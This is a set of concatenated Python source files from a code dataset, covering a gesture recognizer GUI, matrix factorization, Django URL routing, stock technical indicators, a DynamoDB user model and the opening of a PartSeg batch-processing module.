self._lstm = None\r\n\r\n if self._net_type == 'mlp':\r\n self._config.model_params_path = args.mlp_model_params_path\r\n if not os.path.isfile(self._config.model_params_path):\r\n logger.error(\"Model params path {} is not found.\".format(self._config.model_params_path))\r\n else:\r\n logger.info(\"Path of the model parameters file is {}.\".format(self._config.model_params_path))\r\n self._mlp = MLP(self._config)\r\n self._mlp.init_for_infer()\r\n elif self._net_type == 'lenet':\r\n self._config.model_params_path = args.lenet_model_params_path\r\n if not os.path.isfile(self._config.model_params_path):\r\n logger.error(\"Model params path {} is not found.\".format(self._config.model_params_path))\r\n else:\r\n logger.info(\"Path of the model parameters file is {}.\".format(self._config.model_params_path))\r\n self._lenet = LeNet(self._config)\r\n self._lenet.init_for_infer()\r\n elif self._net_type == 'mlp-with-lstm':\r\n self._config.model_params_path = args.lstm_model_params_path\r\n if not os.path.isfile(self._config.model_params_path):\r\n logger.error(\"Model params path {} is not found.\".format(self._config.model_params_path))\r\n else:\r\n logger.info(\"Path of the model parameters file is {}.\".format(self._config.model_params_path))\r\n self._lstm = LSTM(self._config)\r\n self._lstm.init_for_infer()\r\n self._config.model_params_path = args.mlp_model_params_path\r\n if not os.path.isfile(self._config.model_params_path):\r\n logger.error(\"Model params path {} is not found.\".format(self._config.model_params_path))\r\n else:\r\n logger.info(\"Path of the model parameters file is {}.\".format(self._config.model_params_path))\r\n self._mlp = MLP(self._config)\r\n self._mlp.init_for_infer()\r\n else:\r\n raise ValueError(\"Unknown network type {}\".format(self._net_type))\r\n self._labels = None\r\n self._labels_path = args.labels_path\r\n if 
not os.path.isfile(self._labels_path):\r\n logger.error(\"Labels path {} is not found.\".format(self._labels_path))\r\n else:\r\n logger.info(\"Path of the labels file is {}.\".format(self._labels_path))\r\n with open(self._labels_path) as f:\r\n self._labels = f.readlines()\r\n self._points_buf = pointsbuffer.PointsBuffer()\r\n\r\n def _diff_points(self, points):\r\n result = []\r\n if len(points) > 1:\r\n p0 = points[0]\r\n for p1 in points[1:]:\r\n result.append([p1[0] - p0[0], p1[1] - p0[1]])\r\n p0 = p1\r\n return result\r\n\r\n def _undiff_points(self, diff_points, start_point=[0, 0]):\r\n result = []\r\n if len(diff_points) > 0:\r\n p0 = start_point\r\n for dp in diff_points:\r\n p1 = [p0[0]+dp[0], p0[1]+dp[1]]\r\n result.append(p1)\r\n p0 = p1\r\n return result\r\n\r\n def _subtract_point_from_points(self, points, point):\r\n return [[p[0]-point[0], p[1]-point[1]] for p in points]\r\n\r\n def _add_point_to_points(self, points, point):\r\n return [[p[0]+point[0], p[1]+point[1]] for p in points]\r\n\r\n def _standardize(self, points):\r\n result = []\r\n for point in points:\r\n result.append((point[0] / 128.0 - 1.0, point[1] / 128.0 - 1.0))\r\n return result\r\n\r\n def _unstandardize(self, points):\r\n result = []\r\n for point in points:\r\n result.append(((point[0] + 1.0) * 128.0, (point[1] + 1.0) * 128.0))\r\n return result\r\n\r\n def _normalize(self, points):\r\n result = []\r\n minx = float(\"inf\")\r\n miny = float(\"inf\")\r\n maxx = float(\"-inf\")\r\n maxy = float(\"-inf\")\r\n for point in points:\r\n minx = float(point[0]) if minx > point[0] else minx\r\n miny = float(point[1]) if miny > point[1] else miny\r\n maxx = float(point[0]) if maxx < point[0] else maxx\r\n maxy = float(point[1]) if maxy < point[1] else maxy\r\n width = maxx - minx\r\n height = maxy - miny\r\n midx = (maxx + minx) * 0.5\r\n midy = (maxy + miny) * 0.5\r\n scale = width if width > height else height\r\n for point in points:\r\n result.append(((point[0] - midx) * 0.8 / scale, (point[1] - midy) * 0.8 / scale))\r\n return result\r\n\r\n def _get_image(self, points):\r\n image = Image.new('L', (28, 28), (255))\r\n draw = ImageDraw.Draw(image)\r\n for i in range(len(points) - 1):\r\n x0 = int((points[i][0]+1.0) * 14.0)\r\n y0 = int((points[i][1]+1.0) * 14.0)\r\n x1 = int((points[i+1][0]+1.0) * 14.0)\r\n y1 = int((points[i+1][1]+1.0) * 14.0)\r\n x0 = 27 if x0 > 27 else (0 if x0 < 0 else x0)\r\n y0 = 27 if y0 > 27 else (0 if y0 < 0 else y0)\r\n x1 = 27 if x1 > 27 else (0 if x1 < 0 else x1)\r\n y1 = 27 if y1 > 27 else (0 if y1 < 0 else y1)\r\n draw.line((x0, y0, x1, y1), fill=0)\r\n return np.asarray(image)\r\n\r\n def get_network_type(self):\r\n return self._net_type\r\n\r\n # predict next points\r\n def predict(self, points):\r\n tmp_points = self._standardize(points)\r\n for i in range(0, self._config.x_input_length, self._config.x_split_step):\r\n xin = self._subtract_point_from_points(\r\n tmp_points[-self._config.x_input_length:],\r\n tmp_points[-1])\r\n xout = self._lstm.infer(np.asarray(xin)).tolist()\r\n pred = self._add_point_to_points(xout, tmp_points[-1])\r\n tmp_points.extend(pred)\r\n return self._unstandardize(tmp_points)\r\n\r\n # recognize a gesture\r\n def infer(self, points, stroke_terminal=True):\r\n result_label = None\r\n result_points = []\r\n if self._net_type == 'mlp':\r\n self._points_buf.set_points(points)\r\n self._points_buf.adjust()\r\n points = self._points_buf.get_points()\r\n result_label = self._mlp.infer(np.asarray(points))\r\n elif self._net_type == 'lenet':\r\n points 
= self._normalize(points)\r\n image = self._get_image(points)\r\n result_label = self._lenet.infer(image/255.0)\r\n else:\r\n if not stroke_terminal :\r\n tmp_points = self.predict(points)\r\n result_points = tmp_points[len(points):]\r\n points = tmp_points\r\n self._points_buf.set_points(points)\r\n self._points_buf.adjust()\r\n points = self._points_buf.get_points()\r\n result_label = self._mlp.infer(np.asarray(points))\r\n if self._labels is not None and result_label is not None:\r\n result_label = self._labels[result_label]\r\n return (result_label, result_points)\r\n\r\nclass GesturePainter:\r\n def __init__(self, args):\r\n self._config = args\r\n\r\n self._minx = 0\r\n self._miny = 0\r\n self._maxx = 255\r\n self._maxy = 255\r\n self._output_dir = None\r\n self._x = 0\r\n self._y = 0\r\n self._points = []\r\n self._pred_points = []\r\n self._recognizer = None\r\n self._window = None\r\n self._canvas = None\r\n self._result_area = None\r\n self._result_txt = None\r\n self._points_buf = pointsbuffer.PointsBuffer()\r\n self._initWindow()\r\n\r\n def _initWindow(self):\r\n self._window = tkinter.Tk()\r\n self._window.title('Gesture Recognizer')\r\n\r\n self._canvas = tkinter.Canvas(self._window, bg = \"white\", width = self._maxx + 1 - self._minx, height = self._maxy + 1 - self._miny)\r\n self._canvas.pack()\r\n self._canvas.bind(\"\", self._on_canvas_pressed)\r\n self._canvas.bind(\"\", self._on_canvas_released)\r\n self._canvas.bind(\"\", self._on_canvas_dragged)\r\n\r\n quitBtn = tkinter.Button(self._window, text = \"QUIT\", command = self._window.quit)\r\n quitBtn.pack(side = tkinter.RIGHT)\r\n\r\n self._result_txt = tkinter.StringVar()\r\n self._result_txt.set(\"\")\r\n\r\n self._result_area = tkinter.Label(self._window, textvariable = self._result_txt, anchor = tkinter.N, height = 1, font=2)\r\n self._result_area.pack(side = tkinter.LEFT)\r\n\r\n def _fulfill_interpolation(self, points):\r\n self._points_buf.set_points(points)\r\n self._points_buf.fulfill_linear_interpolation()\r\n return self._points_buf.get_points()\r\n\r\n def _on_canvas_pressed(self, event):\r\n self._canvas.delete(\"all\")\r\n self._points = []\r\n if self._minx <= event.x and event.x <= self._maxx:\r\n if self._miny <= event.y and event.y <= self._maxy:\r\n self._x = event.x\r\n self._y = event.y\r\n\r\n def _on_canvas_released(self, event):\r\n result_label, _ = self._recognizer.infer(self._points)\r\n if result_label is not None:\r\n self._result_txt.set(\"You drew \" + result_label)\r\n\r\n def _draw_line(self, p0, p1, color, width=1):\r\n self._canvas.create_line(p0[0], p0[1], p1[0], p1[1], fill = color, width=width)\r\n\r\n def _show_prediction(self):\r\n if len(self._points) % self._config.x_split_step == 0 and \\\r\n len(self._points) >= self._config.x_input_length:\r\n result_label, result_points = self._recognizer.infer(self._points, False)\r\n if len(self._pred_points) > 1:\r\n p2 = self._pred_points[0]\r\n for p3 in self._pred_points[1:]:\r\n self._draw_line(p2, p3, color=\"white\", width=2)\r\n p2 = p3\r\n if len(result_points) > 1:\r\n p2 = result_points[0]\r\n for p3 in result_points[1:]:\r\n self._draw_line(p2, p3, color=\"red\", width=2)\r\n p2 = p3\r\n self._pred_points = result_points\r\n if result_label is not None:\r\n self._result_txt.set(\"You will draw \" + result_label)\r\n\r\n def _on_canvas_dragged(self, event):\r\n if self._minx <= event.x and event.x <= self._maxx:\r\n if self._miny <= event.y and event.y <= self._maxy:\r\n p0 = [self._x, self._y]\r\n p1 = [event.x, event.y]\r\n 
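# [editor's note] _get_image above maps normalized [-1, 1] coordinates onto the
# 28x28 canvas and clamps anything that falls off the edge. Restated standalone:
def to_pixel(v):
    p = int((v + 1.0) * 14.0)     # [-1, 1] -> [0, 28]
    return max(0, min(27, p))     # clamp: 28 would be one past the last pixel

assert to_pixel(-1.0) == 0
assert to_pixel(0.0) == 14
assert to_pixel(1.0) == 27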
","sub_path":"src/tfkeras_gesture_recognizer.py","file_name":"tfkeras_gesture_recognizer.py","file_ext":"py","file_size_in_byte":15339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"405418554","text":"import numpy as np\n\ndef MF(Y,K=2,B=0.001,lam=0.03,stop=3000):\n\tW = np.random.randn(Y.shape[0],K)\n\t#print W\n\tH = np.random.randn(K,Y.shape[1])\n\t#print H\n\tU = Y.shape[0]\n\tI = Y.shape[1]\n\tR = np.sum(Y)\n\t#print Y\n\tdem = 0\n\twhile (dem < stop):\n\t\tdem = dem + 1\n\t\t# gradient update of W and H on the observed (non-zero) entries\n\t\tfor u in range(U):\n\t\t\tfor i in range(I):\n\t\t\t\tif Y[u][i] > 0:\n\t\t\t\t\teui = Y[u][i] - W[u,:].dot(H[:,i])\n\t\t\t\t\tfor k in range(K):\n\t\t\t\t\t\tW[u][k] = W[u][k] + B * (2 * eui * H[k][i] - lam * W[u][k])\n\t\t\t\t\t\tH[k][i] = H[k][i] + B * (2 * eui * W[u][k] - lam * H[k][i])\n\t\t# regularized squared error over the observed entries\n\t\te = 0\n\t\tfor u in range(U):\n\t\t\tfor i in range(I):\n\t\t\t\tif Y[u][i] > 0:\n\t\t\t\t\te = e + pow(Y[u][i] - W[u,:].dot(H[:,i]), 2)\n\t\t\t\t\tfor k in range(K):\n\t\t\t\t\t\te = e + (lam/2) * ( pow(W[u][k],2) + pow(H[k][i],2) )\n\t\tif e < 0.001:\n\t\t\tbreak\n\n\treturn W,H\nY=np.array([[10,24,0,42],[31,0,0,42],[0,53,0,94],[32,0,24,12]])\nX,H=MF(Y)\n#print X\nY_bar = X.dot(H)\nfor i in range(4):\n\tfor j in range(4):\n\t\tprint ('%.8f '%Y_bar[i][j] ,end='')\n\tprint ()
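\n\n# A quick sanity check (illustrative sketch): the factorization is only fitted\n# on the observed (non-zero) entries of Y, so the fit should be measured there.\nmask = Y > 0\nrmse = np.sqrt(np.mean((Y[mask] - Y_bar[mask]) ** 2))\nprint ('masked RMSE: %.8f' % rmse)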
","sub_path":"hethonggoiy/tonghop/MF_thayhieu.py","file_name":"MF_thayhieu.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"357310920","text":"\"\"\"webproj URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n    https://docs.djangoproject.com/en/1.11/topics/http/urls/\r\nExamples:\r\nFunction views\r\n    1. Add an import: from my_app import views\r\n    2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\r\nClass-based views\r\n    1. Add an import: from other_app.views import Home\r\n    2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n    1. Import the include() function: from django.conf.urls import url, include\r\n    2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.conf.urls import url\r\nfrom django.contrib import admin, auth\r\nfrom app import views\r\n\r\n# Named capture groups below were reconstructed; the group names are plausible\r\n# guesses inferred from the route prefixes and view names.\r\nurlpatterns = [\r\n    url(r'^$', views.home, name='home'),\r\n    url(r'^album/(?P<artist>[\\w|\\W]+)/(?P<album>[\\w|\\W]+)$', views.album, name='album'),\r\n    url(r'^artist/(?P<artist>[\\w|\\W]+)$', views.artist, name='artist'),\r\n    url(r'^tag/(?P<tag>[\\w|\\W]+)$', views.tag, name='tag'),\r\n    url(r'^news/$', views.news, name='news'),\r\n    url(r'^search/$', views.search, name='search'),\r\n    url(r'^top/tags/$', views.topArtistsByTag, name='topTags'),\r\n    url(r'^top/countries/$', views.topArtistsByCountry, name='topCountries'),\r\n    # url(r'^top/tags/(?P<page>[0-9]+)$', views.topTagsPage),\r\n    url(r'^top/artists/$', views.topArtists, name='topArtists'),\r\n    url(r'^top/artists/(?P<page>[0-9]+)$', views.topArtistsPage, name='topArtistsPage'),\r\n    url(r'^top/tracks/$', views.topTracks, name='topTracks'),\r\n    url(r'^top/tracks/(?P<page>[0-9]+)$', views.topTracksPage, name='topTracksPage'),\r\n]\r\n","sub_path":"webproj/webproj/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"607707365","text":"import pandas as pd\nimport numpy as np\nfrom statistics import mean\nfrom math import fabs\nfrom LogMessage import TechnicalIndexMessage\nfrom logging import getLogger\nlogger = getLogger()\n\n\ndef GetExponentialMovingAverage(calculateSourceDataFrame, calculate_parameter, calculateSourceColumnName, returnDataFrameColumnName):\n\n    if calculateSourceDataFrame is None or len(calculateSourceDataFrame) == 0:\n        logger.info(TechnicalIndexMessage.sourceDataFrameError_EMA)\n        return None\n\n    if len(calculateSourceDataFrame) < calculate_parameter:\n        logger.info(TechnicalIndexMessage.calculateParameterError_EMA)\n        return None\n\n    if calculateSourceColumnName not in calculateSourceDataFrame:\n        logger.info(TechnicalIndexMessage.calculateSourceColumnError_EMA % calculateSourceColumnName)\n        return None\n\n    calculateSourceData = calculateSourceDataFrame[calculateSourceColumnName].values\n\n    firstEMA = mean(calculateSourceData[0:calculate_parameter])\n    exponentialMovingAverage = [firstEMA]\n\n    smoothingExponential = 2 / (calculate_parameter + 1)\n\n    for idx in range(calculate_parameter, len(calculateSourceData)):\n        before_EMA = exponentialMovingAverage[-1]\n        current_Amount = before_EMA + smoothingExponential * (calculateSourceData[idx] - before_EMA)\n        exponentialMovingAverage.append(current_Amount)\n\n    return pd.DataFrame(exponentialMovingAverage, columns=[returnDataFrameColumnName])\n\n\ndef GetMACD(calculateSourceDataFrame, calculateSourceColumnName, baseLine_parameter, relativeLine_parameter, signal_parameter, MACDDataFrameColumnName, signalDataFrameColumnName):\n\n    if baseLine_parameter > relativeLine_parameter:\n        logger.info(TechnicalIndexMessage.baseLineAndRelativeLineParameterError_MACD)\n        return None, None\n\n    if calculateSourceDataFrame is None or len(calculateSourceDataFrame) == 0:\n        logger.info(TechnicalIndexMessage.sourceDataFrameError_MACD)\n        return None, None\n\n    if calculateSourceColumnName not in calculateSourceDataFrame.columns:\n        logger.info(TechnicalIndexMessage.calculateSourceColumnError_MACD % calculateSourceColumnName)\n        return None, None\n\n    baseLineDataFrame = GetExponentialMovingAverage(calculateSourceDataFrame=calculateSourceDataFrame, calculate_parameter=baseLine_parameter, calculateSourceColumnName=calculateSourceColumnName, 
returnDataFrameColumnName='基準線')\n relativeLineDataFrame = GetExponentialMovingAverage(calculateSourceDataFrame=calculateSourceDataFrame, calculate_parameter=relativeLine_parameter, calculateSourceColumnName=calculateSourceColumnName, returnDataFrameColumnName='相対線')\n\n if baseLineDataFrame is None or len(baseLineDataFrame) == 0:\n logger.info(TechnicalIndexMessage.baseLineDataFrameError_MACD)\n return None, None\n\n if relativeLineDataFrame is None or len(relativeLineDataFrame) == 0:\n logger.info(TechnicalIndexMessage.relativeLineDataFrameError_MACD)\n return None, None\n\n baseLineList = baseLineDataFrame.values\n relativeLineList = relativeLineDataFrame.values\n\n calculated_MACDlist = []\n for idx in range(len(relativeLineList)):\n calculated_MACDlist.append(baseLineList[idx + relativeLine_parameter - baseLine_parameter] - relativeLineList[idx])\n\n if len(calculated_MACDlist) == 0:\n logger.info(TechnicalIndexMessage.MACDcalculateError_MACD)\n return None, None\n\n MACD_DataFrame = pd.DataFrame(calculated_MACDlist, columns=[MACDDataFrameColumnName])\n signalDataFrame = GetExponentialMovingAverage(calculateSourceDataFrame=MACD_DataFrame, calculate_parameter=signal_parameter, calculateSourceColumnName=MACDDataFrameColumnName, returnDataFrameColumnName=signalDataFrameColumnName)\n\n return MACD_DataFrame, signalDataFrame\n\n\ndef __GetDM(todayHigh, todayLow, previousHigh, previousLow):\n\n if len(todayHigh) != len(todayLow) != len(previousHigh) != len(previousLow):\n return None, None\n\n calculateLength = len(todayHigh)\n\n plusDM = np.array([todayHigh[idx] - previousHigh[idx] for idx in range(calculateLength)])\n minusDM = np.array([previousLow[idx] - todayLow[idx] for idx in range(calculateLength)])\n\n for idx in range(calculateLength):\n if plusDM[idx] < 0 and minusDM[idx] < 0:\n plusDM[idx] = 0\n minusDM[idx] = 0\n continue\n\n if plusDM[idx] > minusDM[idx]:\n plusDM[idx] = todayHigh[idx] - previousHigh[idx]\n minusDM[idx] = 0\n continue\n\n if plusDM[idx] < minusDM[idx]:\n plusDM[idx] = 0\n minusDM[idx] = previousLow[idx] - todayLow[idx]\n continue\n\n if plusDM[idx] == minusDM[idx]:\n plusDM[idx] = 0\n minusDM[idx] = 0\n continue\n\n return plusDM, minusDM\n\n\ndef __GetTrueRange(todayHigh, todayLow, previousHigh, previousLow, previousClose):\n\n if len(todayHigh) != len(todayLow) != len(previousHigh) != len(previousLow) != len(previousClose):\n return None\n\n calculateLength = len(todayHigh)\n trueRangeList = []\n for idx in range(calculateLength):\n trueRangeCandidate_1 = fabs(todayHigh[idx] - todayLow[idx])\n trueRangeCandidate_2 = fabs(todayHigh[idx] - previousClose[idx])\n trueRangeCandidate_3 = fabs(previousClose[idx] - todayLow[idx])\n trueRangeList.append(max(trueRangeCandidate_1, trueRangeCandidate_2, trueRangeCandidate_3))\n\n return np.array(trueRangeList)\n\n\ndef __GetDI(plusDM, minusDM, trueRange, DI_Parameter):\n\n if len(plusDM) != len(minusDM) != len(trueRange):\n return None, None\n\n calculateLength = len(plusDM)\n\n if calculateLength < DI_Parameter:\n return None, None\n\n plusDIlist = []\n minusDIlist = []\n for idx in range(calculateLength - DI_Parameter + 1):\n plusDIlist.append(sum(plusDM[idx:DI_Parameter + idx]) / sum(trueRange[idx:DI_Parameter + idx]) * 100)\n minusDIlist.append(sum(minusDM[idx:DI_Parameter + idx]) / sum(trueRange[idx:DI_Parameter + idx]) * 100)\n\n return np.array(plusDIlist), np.array(minusDIlist)\n\n\ndef __GetDX(plusDI, minusDI, DXdataFrameColumnName):\n\n if len(plusDI) != len(minusDI):\n return None\n\n calculateLength = 
len(plusDI)\n\n DXlist = []\n for idx in range(calculateLength):\n DXlist.append(fabs(plusDI[idx] - minusDI[idx]) / (plusDI[idx] + minusDI[idx]) * 100)\n\n return pd.DataFrame(np.array(DXlist), columns=[DXdataFrameColumnName])\n\n\ndef GetDMIandADX(calculateSourceDataFrame, calculateSourceColumnName_TodayHigh, calculateSourceColumnName_TodayLow,\n calculateSourceColumnName_PreviousHigh, calculateSourceColumnName_PreviousLow, calculateSourceColumnName_PreviousClose,\n plusDIcolumnName, minusDIcolumnName, DI_Parameter, ADX_Parameter, ADXcolumnName):\n\n if calculateSourceDataFrame is None or len(calculateSourceDataFrame) == 0:\n logger.info(TechnicalIndexMessage.sourceDataFrameError_DMIandADX)\n return None, None, None\n\n if calculateSourceColumnName_TodayHigh not in calculateSourceDataFrame.columns:\n logger.info(TechnicalIndexMessage.calculateSourceColumnError_DMIandADX % calculateSourceColumnName_TodayHigh)\n return None, None, None\n\n if calculateSourceColumnName_TodayLow not in calculateSourceDataFrame.columns:\n logger.info(TechnicalIndexMessage.calculateSourceColumnError_DMIandADX % calculateSourceColumnName_TodayLow)\n return None, None, None\n\n if calculateSourceColumnName_PreviousHigh not in calculateSourceDataFrame.columns:\n logger.info(TechnicalIndexMessage.calculateSourceColumnError_DMIandADX % calculateSourceColumnName_PreviousHigh)\n return None, None, None\n\n if calculateSourceColumnName_PreviousLow not in calculateSourceDataFrame.columns:\n logger.info(TechnicalIndexMessage.calculateSourceColumnError_DMIandADX % calculateSourceColumnName_PreviousLow)\n return None, None, None\n\n if len(calculateSourceDataFrame) < DI_Parameter:\n logger.info(TechnicalIndexMessage.calculateParameterError_DMIandADX)\n return None, None, None\n\n todayHighList = calculateSourceDataFrame[calculateSourceColumnName_TodayHigh].values\n todayLowList = calculateSourceDataFrame[calculateSourceColumnName_TodayLow].values\n previousHighList = calculateSourceDataFrame[calculateSourceColumnName_PreviousHigh].values\n previousLowList = calculateSourceDataFrame[calculateSourceColumnName_PreviousLow].values\n previousCloseList = calculateSourceDataFrame[calculateSourceColumnName_PreviousClose].values\n\n plusDM, minusDM = __GetDM(todayHighList, todayLowList, previousHighList, previousLowList)\n if plusDM is None or minusDM is None:\n logger.info(TechnicalIndexMessage.calculateDMError_DMIandADX)\n return None, None, None\n\n trueRange = __GetTrueRange(todayHighList, todayLowList, previousHighList, previousLowList, previousCloseList)\n if trueRange is None:\n logger.info(TechnicalIndexMessage.calculateTrueRangeError_DMIandADX)\n return None, None, None\n\n plusDI, minusDI = __GetDI(plusDM, minusDM, trueRange, DI_Parameter)\n if plusDI is None or minusDI is None:\n logger.info(TechnicalIndexMessage.calculateDIError_DMIandADX)\n return None, None, None\n\n DXdataFrameColumnName = 'DX'\n DXdataFrame = __GetDX(plusDI, minusDI, DXdataFrameColumnName)\n if DXdataFrame is None:\n logger.info(TechnicalIndexMessage.calculateDXError_DMIandADX)\n return None, None, None\n\n plusDIdataFrame = pd.DataFrame(np.array(plusDI), columns=[plusDIcolumnName])\n minusDIdataFrame = pd.DataFrame(np.array(minusDI), columns=[minusDIcolumnName])\n ADXdataFrame = GetExponentialMovingAverage(calculateSourceDataFrame=DXdataFrame, calculate_parameter=ADX_Parameter, calculateSourceColumnName=DXdataFrameColumnName, returnDataFrameColumnName=ADXcolumnName)\n\n return plusDIdataFrame, minusDIdataFrame, 
ADXdataFrame\n\n","sub_path":"main/stockPriceAnalize/TechnicalIndex.py","file_name":"TechnicalIndex.py","file_ext":"py","file_size_in_byte":9929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"420491281","text":"from pynamodb.models import Model\nfrom pynamodb.attributes import UnicodeAttribute, JSONAttribute, BooleanAttribute, NumberSetAttribute, NumberAttribute, UTCDateTimeAttribute, UnicodeSetAttribute\nfrom pynamodb.indexes import GlobalSecondaryIndex, AllProjection\nfrom datetime import datetime\n\n\nclass TimeIndex(GlobalSecondaryIndex):\n \"\"\"\n This class represents a global secondary index\n \"\"\"\n class Meta:\n index_name = 'time-index'\n read_capacity_units = 1\n write_capacity_units = 1\n projection = AllProjection()\n time = NumberAttribute(default=9, hash_key=True)\n\n\n\nclass Users(Model):\n class Meta:\n table_name = 'motivora-users'\n\n # Metadata Fields\n phone = NumberAttribute(hash_key=True)\n message_set = UnicodeAttribute(default='EBNHC')\n lang_code = UnicodeAttribute(default='en')\n prev_message = NumberAttribute(default=0)\n send_message = BooleanAttribute(default=True)\n time = NumberAttribute(default=9)\n messages_sent = NumberSetAttribute(default=[0])\n attr_scores = JSONAttribute(null=True)\n preferred_attrs = UnicodeSetAttribute(default=[])\n created_time = UTCDateTimeAttribute(default=datetime.now(), null=False)\n is_real_user = BooleanAttribute(default=True)\n welcome_message_received = BooleanAttribute(default=False)\n next_phone_call = UnicodeAttribute(default='-', null=True)\n\n # Message response fields\n message_response = JSONAttribute(default={}, null=True)\n weekly_goals_message_response = JSONAttribute(default={}, null=True)\n direct_message_response = JSONAttribute(default={}, null=True)\n weekly_progress_message_response = JSONAttribute(default={}, null=True)\n\n # Indices\n time_index = TimeIndex()\n\n def to_json(self):\n json = self.to_dict()\n json['messages_sent'] = list(json['messages_sent'])\n json['preferred_attrs'] = list(json['preferred_attrs'])\n return json\n\n def to_dict(self):\n created_at = str(self.created_time)\n return {\n 'phone': self.phone,\n 'message_set': self.message_set,\n 'lang_code': self.lang_code,\n 'time': self.time,\n 'prev_message': self.prev_message,\n 'send_message': self.send_message,\n 'messages_sent': self.messages_sent,\n 'attr_scores': self.attr_scores,\n 'preferred_attrs': self.preferred_attrs,\n 'message_response': self.message_response,\n 'weekly_goals_message_response': self.weekly_goals_message_response,\n 'weekly_progress_message_response': self.weekly_progress_message_response,\n 'direct_message_response': self.direct_message_response,\n 'created_time': created_at,\n 'is_real_user': self.is_real_user,\n 'welcome_message_received': self.welcome_message_received,\n 'next_phone_call': self.next_phone_call\n }\n\n def to_frontend(self):\n created_at = str(self.created_time)\n num_sent_messages = len(list(self.messages_sent))\n num_rated_messages = 0\n total_rating = 0\n for i, response_data in self.message_response.items():\n if 'message' in response_data:\n total_rating += int(response_data['message'])\n num_rated_messages += 1\n avg_rating = None\n if num_rated_messages > 0:\n avg_rating = round(total_rating * 1.0 / num_rated_messages, 1)\n return {\n 'phone': self.phone,\n 'time': self.time,\n 'message_set': self.message_set,\n 'send_message': self.send_message,\n 'lang_code': self.lang_code,\n 'created_time': created_at,\n 
'preferred_attrs': list(self.preferred_attrs),\n 'num_sent_messages': num_sent_messages,\n 'num_rated_messages': num_rated_messages,\n 'average_rating': avg_rating,\n 'is_real_user': self.is_real_user,\n 'next_phone_call': self.next_phone_call\n }\n","sub_path":"chalicelib/models/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"87115851","text":"\"\"\"\nThis module contains PartSeg function used for calculate in batch processing\n\nCalculation hierarchy:\n\n.. graphviz::\n\n digraph calc {\n rankdir=\"LR\";\n \"CalculationManager\"[shape=rectangle style=filled];\n \"BatchManager\"[shape=rectangle];\n \"BatchWorker\"[shape=rectangle];\n \"CalculationManager\" -> \"BatchManager\" -> \"BatchWorker\"[arrowhead=\"crow\"];\n\n \"CalculationManager\" -> \"DataWriter\"[arrowhead=\"inv\"];\n \"DataWriter\"[shape=rectangle];\n \"FileData\"[shape=rectangle];\n \"SheetData\"[shape=rectangle];\n \"DataWriter\" -> \"FileData\" -> \"SheetData\"[arrowhead=\"crow\"];\n }\n\n\"\"\"\nimport contextlib\nimport json\nimport logging\nimport math\nimport os\nimport threading\nimport traceback\nimport uuid\nfrom collections import OrderedDict\nfrom enum import Enum\nfrom os import path\nfrom queue import Queue\nfrom traceback import StackSummary\nfrom typing import Any, Dict, List, NamedTuple, Optional, Tuple, Type, Union\n\nimport numpy as np\nimport pandas as pd\nimport SimpleITK\nimport tifffile\nimport xlsxwriter\n\nfrom PartSegCore.algorithm_describe_base import ROIExtractionProfile\nfrom PartSegCore.analysis.algorithm_description import AnalysisAlgorithmSelection\nfrom PartSegCore.analysis.batch_processing.parallel_backend import BatchManager, SubprocessOrder\nfrom PartSegCore.analysis.calculation_plan import (\n BaseCalculation,\n Calculation,\n CalculationPlan,\n CalculationTree,\n FileCalculation,\n MaskCreate,\n MaskIntersection,\n MaskMapper,\n MaskSum,\n MaskUse,\n MeasurementCalculate,\n Operations,\n RootType,\n Save,\n get_save_path,\n)\nfrom PartSegCore.analysis.io_utils import ProjectTuple\nfrom PartSegCore.analysis.load_functions import LoadMaskSegmentation, LoadProject, load_dict\nfrom PartSegCore.analysis.measurement_base import has_mask_components, has_roi_components\nfrom PartSegCore.analysis.measurement_calculation import MeasurementResult\nfrom PartSegCore.analysis.save_functions import save_dict\nfrom PartSegCore.io_utils import WrongFileTypeException\nfrom PartSegCore.json_hooks import PartSegEncoder\nfrom PartSegCore.mask_create import calculate_mask\nfrom PartSegCore.project_info import AdditionalLayerDescription, HistoryElement\nfrom PartSegCore.roi_info import ROIInfo\nfrom PartSegCore.segmentation import RestartableAlgorithm\nfrom PartSegCore.segmentation.algorithm_base import ROIExtractionAlgorithm, report_empty_fun\nfrom PartSegCore.utils import iterate_names\nfrom PartSegImage import Image, TiffImageReader\n\n# https://support.microsoft.com/en-us/office/excel-specifications-and-limits-1672b34d-7043-467e-8e27-269d656771c3#ID0EDBD=Newer_versions\n# page with excel limits\nMAX_CHAR_IN_EXCEL_CELL = 30_000 # real limit is 32_767 but it is better to have some margin\nMAX_ROWS_IN_EXCEL_CELL = 50 # real limit is 253 but 50 provides better readability\n\n\nclass ResponseData(NamedTuple):\n path_to_file: str\n values: List[MeasurementResult]\n\n\nCalculationResultList = List[ResponseData]\nErrorInfo = Tuple[Exception, Union[StackSummary, Tuple[Dict, 
StackSummary]]]\nWrappedResult = Tuple[int, List[Union[ErrorInfo, ResponseData]]]\n\n\ndef prepare_error_data(exception: Exception) -> ErrorInfo:\n try:\n from sentry_sdk.serializer import serialize\n from sentry_sdk.utils import event_from_exception\n\n event = event_from_exception(exception)[0]\n event = serialize(event)\n return exception, (event, traceback.extract_tb(exception.__traceback__))\n except ImportError: # pragma: no cover\n return exception, traceback.extract_tb(exception.__traceback__)\n\n\ndef do_calculation(file_info: Tuple[int, str], calculation: BaseCalculation) -> WrappedResult:\n \"\"\"\n Main function which will be used for run calculation.\n It create :py:class:`.CalculationProcess` and call it method\n :py:meth:`.CalculationProcess.do_calculation`\n\n :param file_info: index and path to file which should be processed\n :param calculation: calculation description\n \"\"\"\n with contextlib.suppress(AttributeError):\n SimpleITK.ProcessObject_SetGlobalDefaultNumberOfThreads(1)\n calc = CalculationProcess()\n index, file_path = file_info\n try:\n return index, 